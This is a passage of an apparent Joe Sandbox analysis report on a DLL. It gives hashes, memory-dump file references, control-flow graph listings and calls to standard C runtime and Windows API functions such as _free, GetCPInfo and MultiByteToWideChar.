                                                                                                      • Opcode ID: 5bb3496740f5117d0205109ec9fbe746bddc88d41aca910457d7e3f6387fb5a8
                                                                                                      • Instruction ID: 72cac4d347fc4245a07492ab9a06cccee964312c266c8b3bc3772fd3eacb0e92
                                                                                                      • Opcode Fuzzy Hash: 5bb3496740f5117d0205109ec9fbe746bddc88d41aca910457d7e3f6387fb5a8
                                                                                                      • Instruction Fuzzy Hash: E5E19F72D14119AFDB25CFA8DC80EAEBBB9FF49310F154229E915A7280DB34AD01CB91
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2671974312.000000006D401000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2671852129.000000006D400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672229024.000000006D42F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672305968.000000006D431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d400000_loaddll32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: c69e178ba255c5643041b5c5e97ae14208e863c0a604a92979f8563e4dd8e4f5
                                                                                                      • Instruction ID: f619f8a7c53249401a0dfb94190d8d88a5bc234dda611c1b6b94c6f356a22533
                                                                                                      • Opcode Fuzzy Hash: c69e178ba255c5643041b5c5e97ae14208e863c0a604a92979f8563e4dd8e4f5
                                                                                                      • Instruction Fuzzy Hash: 3C21B673F20538477B0CC47E8C5227DB6E1C78C511745827AF8A6DA3C1D968D917E2E4
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2671974312.000000006D401000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2671852129.000000006D400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672229024.000000006D42F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672305968.000000006D431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d400000_loaddll32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 1993dcfcd999f1d43d17aedfd461389ddb5be5af0c0335110fedf270903fff89
                                                                                                      • Instruction ID: 51dd7146bd86db630a79bb4e4487f9c14f93938d93cbe256b5cdde4a58211ad1
                                                                                                      • Opcode Fuzzy Hash: 1993dcfcd999f1d43d17aedfd461389ddb5be5af0c0335110fedf270903fff89
                                                                                                      • Instruction Fuzzy Hash: 95119463F308395B374CC56E8C93379A6D1EB9C64034A523EE9A6D62C0E564DA23D2D4
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2671974312.000000006D401000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2671852129.000000006D400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672229024.000000006D42F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672305968.000000006D431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d400000_loaddll32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 741f827db8226f69ae54fa9e4d8d52a66ea3054a2f246a32446f05698d0524cb
                                                                                                      • Instruction ID: bdda8e4e8cd63eea488553fb3d0edb5fb912b18cb57ad0480c7b1f2825e4c3e7
                                                                                                      • Opcode Fuzzy Hash: 741f827db8226f69ae54fa9e4d8d52a66ea3054a2f246a32446f05698d0524cb
                                                                                                      • Instruction Fuzzy Hash: 82E04F3296912CEBC710CA88D900E6AF3ECE749A50B12019AF514D3210D6719E00CBC0

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 479 6d40d983-6d40d9ba 480 6d40d9c0-6d40d9c8 479->480 481 6d40dcff-6d40dd07 479->481 482 6d40d9e6-6d40d9e8 480->482 483 6d40d9ca-6d40d9e0 call 6d415999 480->483 484 6d40dd09 481->484 485 6d40dd0c-6d40dd34 481->485 487 6d40d9ea call 6d414939 482->487 483->482 492 6d40dccc-6d40dcf1 call 6d411902 * 4 483->492 484->485 488 6d40dd3b-6d40dd4b call 6d407ac2 485->488 490 6d40d9ef-6d40d9ff call 6d411902 487->490 498 6d40da00 call 6d414939 490->498 511 6d40dcf2-6d40dcfd call 6d411902 492->511 500 6d40da05-6d40da10 call 6d411902 498->500 506 6d40da11 call 6d414939 500->506 508 6d40da16-6d40da21 call 6d411902 506->508 514 6d40da22 call 6d414939 508->514 511->488 516 6d40da27-6d40da32 call 6d411902 514->516 519 6d40da37 call 6d414939 516->519 520 6d40da3c-6d40da4d call 6d411902 519->520 520->492 523 6d40da53-6d40da56 520->523 523->492 524 6d40da5c-6d40da5e 523->524 524->492 525 6d40da64-6d40da67 524->525 525->492 526 6d40da6d-6d40da70 525->526 526->492 527 6d40da76 526->527 528 6d40da78-6d40da81 527->528 528->528 529 6d40da83-6d40da92 GetCPInfo 528->529 529->492 530 6d40da98-6d40da9e 529->530 530->492 531 6d40daa4-6d40daad 530->531 532 6d40dada-6d40db08 call 6d415e35 531->532 533 6d40daaf-6d40dab5 531->533 532->492 539 6d40db0e-6d40db3c call 6d415e35 532->539 533->532 534 6d40dab7-6d40dabc 533->534 534->532 536 6d40dabe-6d40dac4 534->536 538 6d40dacf-6d40dad1 536->538 540 6d40dad3-6d40dad8 538->540 541 6d40dac6-6d40dacb 538->541 539->492 544 6d40db42-6d40db65 call 6d415b4b 539->544 540->532 540->534 541->538 544->492 547 6d40db6b-6d40dba2 544->547 548 6d40dba4-6d40dbaa 547->548 549 6d40dc0f-6d40dc4a 547->549 548->549 550 6d40dbac 548->550 551 6d40dc95-6d40dcca 549->551 552 6d40dc4c-6d40dc53 549->552 553 6d40dbaf-6d40dbb4 550->553 551->511 552->551 554 6d40dc55-6d40dc92 call 6d411902 * 4 552->554 555 6d40dbb6-6d40dbbe 553->555 556 6d40dc0a-6d40dc0d 553->556 554->551 558 6d40dbc0-6d40dbdc 555->558 559 6d40dc02-6d40dc08 555->559 556->549 562 6d40dbdf-6d40dbf7 558->562 559->553 559->556 562->562 564 6d40dbf9-6d40dbff 562->564 564->559
                                                                                                      APIs
                                                                                                      • _free.LIBCMT ref: 6D40D9F3
                                                                                                      • _free.LIBCMT ref: 6D40DA09
                                                                                                      • _free.LIBCMT ref: 6D40DA1A
                                                                                                      • _free.LIBCMT ref: 6D40DA2B
                                                                                                      • _free.LIBCMT ref: 6D40DA42
                                                                                                      • GetCPInfo.KERNEL32(?,?), ref: 6D40DA8A
                                                                                                        • Part of subcall function 6D415999: _free.LIBCMT ref: 6D415A04
                                                                                                      • _free.LIBCMT ref: 6D40DC61
                                                                                                      • _free.LIBCMT ref: 6D40DC74
                                                                                                      • _free.LIBCMT ref: 6D40DC82
                                                                                                      • _free.LIBCMT ref: 6D40DC8D
                                                                                                      • _free.LIBCMT ref: 6D40DCCF
                                                                                                      • _free.LIBCMT ref: 6D40DCD7
                                                                                                      • _free.LIBCMT ref: 6D40DCDF
                                                                                                      • _free.LIBCMT ref: 6D40DCE7
                                                                                                      • _free.LIBCMT ref: 6D40DCF5
                                                                                                        • Part of subcall function 6D415B4B: MultiByteToWideChar.KERNEL32(00000000,00000000,0000007F,6D424440,00000000,00000000,?,?,?,00000004,00000000,00000001,6D424440,0000007F,?,?), ref: 6D415B93
                                                                                                        • Part of subcall function 6D415B4B: __alloca_probe_16.LIBCMT ref: 6D415BBC
                                                                                                        • Part of subcall function 6D415B4B: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,?), ref: 6D415C08
                                                                                                        • Part of subcall function 6D415B4B: GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 6D415C1A
                                                                                                        • Part of subcall function 6D415B4B: __freea.LIBCMT ref: 6D415C23
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2671974312.000000006D401000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2671852129.000000006D400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672229024.000000006D42F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672305968.000000006D431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d400000_loaddll32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _free$ByteCharMultiWide$InfoStringType__alloca_probe_16__freea
                                                                                                      • String ID: p6Bm
                                                                                                      • API String ID: 4259107651-2614220480
                                                                                                      • Opcode ID: 3eab497f1501005cb2bd6b19de4e0be3ed04f279ab3f47602a162afacb61769a
                                                                                                      • Instruction ID: 20ab0333f016e951af749b0fb31a523a38651984501ec7cd00829c2beadfc04e
                                                                                                      • Opcode Fuzzy Hash: 3eab497f1501005cb2bd6b19de4e0be3ed04f279ab3f47602a162afacb61769a
                                                                                                      • Instruction Fuzzy Hash: D5C16A7090820AAFDB11CFA8C881FFABBB9BF48304F14446DE599AB751D775AC45CB60

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 569 6d41a996-6d41a9aa 570 6d41aa18-6d41aa20 569->570 571 6d41a9ac-6d41a9b1 569->571 572 6d41aa22-6d41aa25 570->572 573 6d41aa67-6d41aa7f call 6d41ab09 570->573 571->570 574 6d41a9b3-6d41a9b8 571->574 572->573 575 6d41aa27-6d41aa64 call 6d411902 * 4 572->575 582 6d41aa82-6d41aa89 573->582 574->570 577 6d41a9ba-6d41a9bd 574->577 575->573 577->570 580 6d41a9bf-6d41a9c7 577->580 583 6d41a9e1-6d41a9e9 580->583 584 6d41a9c9-6d41a9cc 580->584 588 6d41aaa8-6d41aaac 582->588 589 6d41aa8b-6d41aa8f 582->589 586 6d41aa03-6d41aa17 call 6d411902 * 2 583->586 587 6d41a9eb-6d41a9ee 583->587 584->583 590 6d41a9ce-6d41a9e0 call 6d411902 call 6d41c12f 584->590 586->570 587->586 595 6d41a9f0-6d41aa02 call 6d411902 call 6d41c5e8 587->595 596 6d41aac4-6d41aad0 588->596 597 6d41aaae-6d41aab3 588->597 591 6d41aa91-6d41aa94 589->591 592 6d41aaa5 589->592 590->583 591->592 599 6d41aa96-6d41aaa4 call 6d411902 * 2 591->599 592->588 595->586 596->582 606 6d41aad2-6d41aadf call 6d411902 596->606 603 6d41aac1 597->603 604 6d41aab5-6d41aab8 597->604 599->592 603->596 604->603 612 6d41aaba-6d41aac0 call 6d411902 604->612 612->603
                                                                                                      APIs
                                                                                                      • ___free_lconv_mon.LIBCMT ref: 6D41A9DA
                                                                                                        • Part of subcall function 6D41C12F: _free.LIBCMT ref: 6D41C14C
                                                                                                        • Part of subcall function 6D41C12F: _free.LIBCMT ref: 6D41C15E
                                                                                                        • Part of subcall function 6D41C12F: _free.LIBCMT ref: 6D41C170
                                                                                                        • Part of subcall function 6D41C12F: _free.LIBCMT ref: 6D41C182
                                                                                                        • Part of subcall function 6D41C12F: _free.LIBCMT ref: 6D41C194
                                                                                                        • Part of subcall function 6D41C12F: _free.LIBCMT ref: 6D41C1A6
                                                                                                        • Part of subcall function 6D41C12F: _free.LIBCMT ref: 6D41C1B8
                                                                                                        • Part of subcall function 6D41C12F: _free.LIBCMT ref: 6D41C1CA
                                                                                                        • Part of subcall function 6D41C12F: _free.LIBCMT ref: 6D41C1DC
                                                                                                        • Part of subcall function 6D41C12F: _free.LIBCMT ref: 6D41C1EE
                                                                                                        • Part of subcall function 6D41C12F: _free.LIBCMT ref: 6D41C200
                                                                                                        • Part of subcall function 6D41C12F: _free.LIBCMT ref: 6D41C212
                                                                                                        • Part of subcall function 6D41C12F: _free.LIBCMT ref: 6D41C224
                                                                                                      • _free.LIBCMT ref: 6D41A9CF
                                                                                                        • Part of subcall function 6D411902: HeapFree.KERNEL32(00000000,00000000,?,6D41C896,?,00000000,?,00000000,?,6D41CB3B,?,00000007,?,?,6D41AB2E,?), ref: 6D411918
                                                                                                        • Part of subcall function 6D411902: GetLastError.KERNEL32(?,?,6D41C896,?,00000000,?,00000000,?,6D41CB3B,?,00000007,?,?,6D41AB2E,?,?), ref: 6D41192A
                                                                                                      • _free.LIBCMT ref: 6D41A9F1
                                                                                                      • _free.LIBCMT ref: 6D41AA06
                                                                                                      • _free.LIBCMT ref: 6D41AA11
                                                                                                      • _free.LIBCMT ref: 6D41AA33
                                                                                                      • _free.LIBCMT ref: 6D41AA46
                                                                                                      • _free.LIBCMT ref: 6D41AA54
                                                                                                      • _free.LIBCMT ref: 6D41AA5F
                                                                                                      • _free.LIBCMT ref: 6D41AA97
                                                                                                      • _free.LIBCMT ref: 6D41AA9E
                                                                                                      • _free.LIBCMT ref: 6D41AABB
                                                                                                      • _free.LIBCMT ref: 6D41AAD3
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2671974312.000000006D401000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2671852129.000000006D400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672229024.000000006D42F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672305968.000000006D431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d400000_loaddll32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                      • String ID:
                                                                                                      • API String ID: 161543041-0
                                                                                                      • Opcode ID: 2c1b3f3868d03def5ba4d96533478a81f36d4783d3a93b6cc37349a38a7e9d88
                                                                                                      • Instruction ID: c06b2d9fda8ddac622113b09179b090e3a52006c448da4336fbdc7e3457ff188
                                                                                                      • Opcode Fuzzy Hash: 2c1b3f3868d03def5ba4d96533478a81f36d4783d3a93b6cc37349a38a7e9d88
                                                                                                      • Instruction Fuzzy Hash: 4131487160C306AFEB118F38DD46F7AB3E8AF00355F618469E168D6250DB31AD99CB60
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2671974312.000000006D401000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2671852129.000000006D400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672229024.000000006D42F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672305968.000000006D431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d400000_loaddll32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _free
                                                                                                      • String ID:
                                                                                                      • API String ID: 269201875-0
                                                                                                      • Opcode ID: b0af6731db60a6ba4c045a4da7f1065d66af05b5a105c5ac24c5d9d2c4ecbd46
                                                                                                      • Instruction ID: 790c20f1a9e9720d5fd6dd72cb3fb39ac5b4220072b521f07870c1a6e94a89cb
                                                                                                      • Opcode Fuzzy Hash: b0af6731db60a6ba4c045a4da7f1065d66af05b5a105c5ac24c5d9d2c4ecbd46
                                                                                                      • Instruction Fuzzy Hash: FBC146B2D58219AFDB10CBA8CC42FFEB7F8AB09714F154169FA04EB281D7709D4187A5
                                                                                                      APIs
                                                                                                      • IsInExceptionSpec.LIBVCRUNTIME ref: 6D40AE0C
                                                                                                      • type_info::operator==.LIBVCRUNTIME ref: 6D40AE2E
                                                                                                      • ___TypeMatch.LIBVCRUNTIME ref: 6D40AF3D
                                                                                                      • IsInExceptionSpec.LIBVCRUNTIME ref: 6D40B00F
                                                                                                      • _UnwindNestedFrames.LIBCMT ref: 6D40B093
                                                                                                      • CallUnexpected.LIBVCRUNTIME ref: 6D40B0AE
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2671974312.000000006D401000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2671852129.000000006D400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672229024.000000006D42F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672305968.000000006D431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d400000_loaddll32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                                      • String ID: H$Bm$csm$csm$csm
                                                                                                      • API String ID: 2123188842-753754078
                                                                                                      • Opcode ID: 732f47f6d5987a8ad2dce28326c9c71c27d134143bbac50f8fa583257931c90f
                                                                                                      • Instruction ID: 89e03692221aa1b9645bab497de9ce2203ae565ba2a8b322237c221353c6efe3
                                                                                                      • Opcode Fuzzy Hash: 732f47f6d5987a8ad2dce28326c9c71c27d134143bbac50f8fa583257931c90f
                                                                                                      • Instruction Fuzzy Hash: 1CB1577190420AAFCF05DFA4C981EAEB7B5FF08314B21857AEA246B211D331DE51CBD5
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2671974312.000000006D401000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2671852129.000000006D400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672229024.000000006D42F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672305968.000000006D431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d400000_loaddll32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID: 0-3907804496
                                                                                                      • Opcode ID: 2c56a7eb158f516d3f12acd2681c84f1d5b453c845fa827435f8bc414940c96f
                                                                                                      • Instruction ID: 4108719bde80870ec89cc395e59a653190041ee3372ee4348d3faefbde9634b9
                                                                                                      • Opcode Fuzzy Hash: 2c56a7eb158f516d3f12acd2681c84f1d5b453c845fa827435f8bc414940c96f
                                                                                                      • Instruction Fuzzy Hash: E2C17C74E0C28AEBDB01CFA9C880FBD7BB4AF4A304F154199E954A7391D7349D45CBA1
                                                                                                      APIs
                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 6D404B3F
                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 6D404B61
                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 6D404B81
                                                                                                      • std::_Facet_Register.LIBCPMT ref: 6D404CEA
                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 6D404D02
                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 6D404D24
                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 6D404D29
                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 6D404D2E
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2671974312.000000006D401000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2671852129.000000006D400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672229024.000000006D42F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672305968.000000006D431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d400000_loaddll32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: std::_$Lockit$Concurrency::cancel_current_task$Lockit::_Lockit::~_$Facet_Register
                                                                                                      • String ID: false$true
                                                                                                      • API String ID: 3742692055-2658103896
                                                                                                      • Opcode ID: a3dc8e4420e553315af9abe9317a68559f0c30a49f18814b2f212fdea84c53a6
                                                                                                      • Instruction ID: 7cd7366827b881dcd6dc4c3fa3b0870112bfb35d31050d97a52b351406303239
                                                                                                      • Opcode Fuzzy Hash: a3dc8e4420e553315af9abe9317a68559f0c30a49f18814b2f212fdea84c53a6
                                                                                                      • Instruction Fuzzy Hash: AB61BF70A082468BDB24DF68C540FAEBBB4EF09314F11456DD946AB380EB75EE05CBD1
                                                                                                      APIs
                                                                                                      • _free.LIBCMT ref: 6D411E24
                                                                                                        • Part of subcall function 6D411902: HeapFree.KERNEL32(00000000,00000000,?,6D41C896,?,00000000,?,00000000,?,6D41CB3B,?,00000007,?,?,6D41AB2E,?), ref: 6D411918
                                                                                                        • Part of subcall function 6D411902: GetLastError.KERNEL32(?,?,6D41C896,?,00000000,?,00000000,?,6D41CB3B,?,00000007,?,?,6D41AB2E,?,?), ref: 6D41192A
                                                                                                      • _free.LIBCMT ref: 6D411E30
                                                                                                      • _free.LIBCMT ref: 6D411E3B
                                                                                                      • _free.LIBCMT ref: 6D411E46
                                                                                                      • _free.LIBCMT ref: 6D411E51
                                                                                                      • _free.LIBCMT ref: 6D411E5C
                                                                                                      • _free.LIBCMT ref: 6D411E67
                                                                                                      • _free.LIBCMT ref: 6D411E72
                                                                                                      • _free.LIBCMT ref: 6D411E7D
                                                                                                      • _free.LIBCMT ref: 6D411E8B
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2671974312.000000006D401000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2671852129.000000006D400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672229024.000000006D42F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672305968.000000006D431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d400000_loaddll32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                      • String ID:
                                                                                                      • API String ID: 776569668-0
                                                                                                      • Opcode ID: 4fd02179c05e1e35d8714373d6a32b8365ae539a4e8f06a413fd64904375f900
                                                                                                      • Instruction ID: 97382ea644df34c89ef42d7b2f3f39a9c1397edaf8b8a476c2cba99be95b9923
                                                                                                      • Opcode Fuzzy Hash: 4fd02179c05e1e35d8714373d6a32b8365ae539a4e8f06a413fd64904375f900
                                                                                                      • Instruction Fuzzy Hash: 99219BB691810CAFCB41DF94CC41DED7BB9FF18245F0141A9E6659B121DB31DA54CB80
                                                                                                      APIs
                                                                                                        • Part of subcall function 6D411F56: GetLastError.KERNEL32(00000000,00000000,6D40C19D,00000000,00000000,?,6D4153C8,00000000,00000000,?,0161F638,00000000), ref: 6D411F5A
                                                                                                        • Part of subcall function 6D411F56: SetLastError.KERNEL32(00000000,00000004,000000FF,?,6D4153C8,00000000,00000000,?,0161F638,00000000), ref: 6D411FFE
                                                                                                      • _free.LIBCMT ref: 6D413DA9
                                                                                                      • _free.LIBCMT ref: 6D413DC2
                                                                                                      • _free.LIBCMT ref: 6D413DF4
                                                                                                      • _free.LIBCMT ref: 6D413DFD
                                                                                                      • _free.LIBCMT ref: 6D413E09
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2671974312.000000006D401000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2671852129.000000006D400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672229024.000000006D42F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672305968.000000006D431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d400000_loaddll32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _free$ErrorLast
                                                                                                      • String ID: C$Eh@m$e/Am
                                                                                                      • API String ID: 3291180501-3560445338
                                                                                                      • Opcode ID: 1c7e040a122c0bf1e8fe2c1a3dd9152ae00c77b59181b3a8f32946cae5906f3c
                                                                                                      • Instruction ID: 3b13344dac8476c2a80e2ba62705cd75c14e8bf3f8b458eccce6325fdafa22b5
                                                                                                      • Opcode Fuzzy Hash: 1c7e040a122c0bf1e8fe2c1a3dd9152ae00c77b59181b3a8f32946cae5906f3c
                                                                                                      • Instruction Fuzzy Hash: 62B10B75A0921A9BDB24DF18CC88FA9B7B4FB49314F5045EED949A7350E731AE90CF80
                                                                                                      APIs
                                                                                                      • __EH_prolog3.LIBCMT ref: 6D40619F
                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 6D4061A9
                                                                                                        • Part of subcall function 6D401BC0: std::_Lockit::_Lockit.LIBCPMT ref: 6D401BDD
                                                                                                        • Part of subcall function 6D401BC0: std::_Lockit::~_Lockit.LIBCPMT ref: 6D401BF9
                                                                                                      • codecvt.LIBCPMT ref: 6D4061E3
                                                                                                      • std::_Facet_Register.LIBCPMT ref: 6D4061FA
                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 6D40621A
                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 6D406227
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2671974312.000000006D401000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2671852129.000000006D400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672229024.000000006D42F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672305968.000000006D431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d400000_loaddll32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercodecvt
                                                                                                      • String ID: Eh@m
                                                                                                      • API String ID: 2133458128-137412459
                                                                                                      • Opcode ID: 1af045c21d61ca0b4edc96a7ae17ba4f195a884bd7cef8dcdef5cc0a959c07fa
                                                                                                      • Instruction ID: 5d6f28e383d7ea728bc1b55055498d3465a6035b64c86671759614d891d94ba1
                                                                                                      • Opcode Fuzzy Hash: 1af045c21d61ca0b4edc96a7ae17ba4f195a884bd7cef8dcdef5cc0a959c07fa
                                                                                                      • Instruction Fuzzy Hash: D201D2329081158BCB05EFA0C640FBEB7B5AF85318F66082DE911AB380DF749D41CBD1
                                                                                                      APIs
                                                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,6D40CB2D,6D40CB2D,?,?,?,6D415E69,00000001,00000001,B8E85006), ref: 6D415CA9
                                                                                                      • __alloca_probe_16.LIBCMT ref: 6D415CD1
                                                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,00000000,?,?,?,6D415E69,00000001,00000001,B8E85006,?,?,?), ref: 6D415D12
                                                                                                      • __alloca_probe_16.LIBCMT ref: 6D415D95
